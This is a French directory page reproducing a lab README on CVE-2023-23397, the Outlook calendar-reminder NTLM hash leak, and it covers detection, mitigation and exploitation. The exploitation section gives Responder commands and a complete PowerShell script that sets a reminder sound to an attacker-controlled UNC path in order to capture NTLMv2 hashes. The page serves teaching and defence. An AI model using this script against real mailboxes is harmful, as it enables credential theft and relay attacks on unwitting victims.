Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-23397 — Demonstration of CVE-2023-23397 Outlook Privellege Escalation vulnerability | Kitploit
Outils/GitHubGitHub/gilospy/cve-2023-23397
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubgilospy/cve-2023-23397

CVE-2023-23397

Demonstration of CVE-2023-23397 Outlook Privellege Escalation vulnerability

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-23397 Démonstration d'exploitation et d'atténuation

📌 Aperçu

Ce projet démontre la détection, l'exploitation et l'atténuation de CVE-2023-23397, une vulnérabilité critique de relais NTLM sans clic dans Microsoft Outlook pour Windows. Exploitée via des invitations de calendrier, cette vulnérabilité permet aux attaquants de capturer des hachages NTLMv2 sans aucune interaction de l'utilisateur.

🛡️ Score CVSS : 9.8 (Critique)
🖥️ Versions concernées : Outlook 2013, 2016, 2019, Microsoft 365 (avant le correctif du 14 mars 2023)


⚠️ Détails de la vulnérabilité

Les rappels de calendrier d'Outlook peuvent être configurés pour jouer des sons personnalisés via la propriété MAPI PidLidReminderFileParameter. Outlook ne valide pas les chemins UNC, ce qui permet des requêtes SMB distantes lorsque les rappels sont déclenchés.

root@kitploit:~
\\attacker-ip\share\sound.wav

Cela entraîne l'envoi de hachages NTLMv2 à des serveurs contrôlés par l'attaquant, qui peuvent ensuite :

  • Être craqués hors ligne (récupération de mot de passe)
  • Être utilisés dans des attaques de relais NTLM pour une élévation de privilèges

🔍 Méthode de détection

Utilisez MFCMAPI pour inspecter les éléments du calendrier et vérifier la présence de valeurs malveillantes dans PidLidReminderFileParameter (tag MAPI 0x851F001F).

Étapes :

  1. Ouvrir MFCMAPI → QuickStart > Ouvrir le dossier > Calendrier
  2. Aller à Table > Définir les colonnes
  3. Ajouter le tag de propriété 0x808A001F pour afficher les chemins de fichiers des rappels
  4. Rechercher les chemins UNC comme indicateur de compromission

🛠️ Techniques d'atténuation

1. Appliquer le correctif Microsoft (Recommandé)

Installez le correctif du 14 mars 2023 (par exemple, KB5002044). Le correctif introduit :

  • IsFileZoneLocalIntranetOrTrusted() pour valider les chemins de fichiers des rappels
  • Options de stratégie de groupe pour définir les domaines de confiance

Résultat du test :
Outlook enregistrera l'ID d'événement 1008 et bloquera l'accès aux chemins SMB non approuvés.


2. Atténuation au niveau réseau IPsec (temporaire)

a. Bloquer tout SMB

  • Bloque le TCP sortant 445 (SMB)
  • Empêche les fuites NTLM vers des réseaux non approuvés

b. Autoriser uniquement les IP de confiance

  • Définir les IP internes (par exemple, 192.168.1.0/24)
  • Maintenir la continuité des activités pour l'utilisation interne de SMB

📂 Politique pré-construite : OutlookMitigation.ipsec


💻 Configuration du projet

Environnement

SystèmeNom d'utilisateurMot de passe
Kali Linuxkalikali
Windows 10 VMCVE-2023-23397vbox@123
Compte emailvictim​@exploit.comvbox@123

Attaquant (Kali Linux)

root@kitploit:~
sudo apt install responder
sudo responder -I eth0 -v

Assurez-vous que Kali et la VM victime sont sur le même réseau.


Victime (Windows + Outlook 2013)

  1. Installer :

    • Outlook 2013
    • .NET 2.0
    • hMailServer
    • MFCMAPI
  2. Configurer :

    • Domaine hMailServer : exploit.com
    • Utilisateur email : [email protected]

🚨 Exploitation (Script PowerShell)

root@kitploit:~
# Initialize Outlook COM object
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNamespace("MAPI")
 
$ip = "192.168.1.7" # Attacker IP here
$emails = @("[email protected]")  # List of emails

# Create a new appointment item
$Appointment = $Outlook.CreateItem(1) # 1 corresponds to olAppointmentItem

# Set appointment properties
$Appointment.Subject = "CVE Presentation Demo Demo"
$Appointment.Body = "This is a test meeting, please ignore it."
$Appointment.Location = "Dubai"
$Appointment.Start = (Get-Date).AddSeconds(1) # Start time set to 1 second from now
$Appointment.Duration = 30 # Duration in minutes

# Configure reminder settings
$Appointment.ReminderSet = $true
$Appointment.ReminderMinutesBeforeStart = 0
$Appointment.ReminderOverrideDefault = $true
$Appointment.ReminderPlaySound = $true
$Appointment.ReminderSoundFile = "\\$ip\nonexistent\sound.wav"

foreach ($email in $emails) {
    $Appointment.Recipients.Add($email) | Out-Null
}

# Save and send the appointment
$Appointment.Save()
$Appointment.Send()

Responder capturera le hachage NTLMv2 du système victime.


✅ Vérification

Détection

  • Utilisez MFCMAPI pour confirmer que PidLidReminderFileParameter contient un chemin UNC.

Atténuation

  • Appliquer le correctif ou la politique IPsec.
  • Relancer le script : Outlook peut afficher un rappel mais aucun hachage NTLM ne doit être capturé.

❗ Limitations

  • Bloquer tout le trafic SMB peut affecter les services légitimes (partage de fichiers, authentification de domaine)
  • Le maintien des IP de confiance peut devenir complexe sur le plan opérationnel
Télécharger l’outil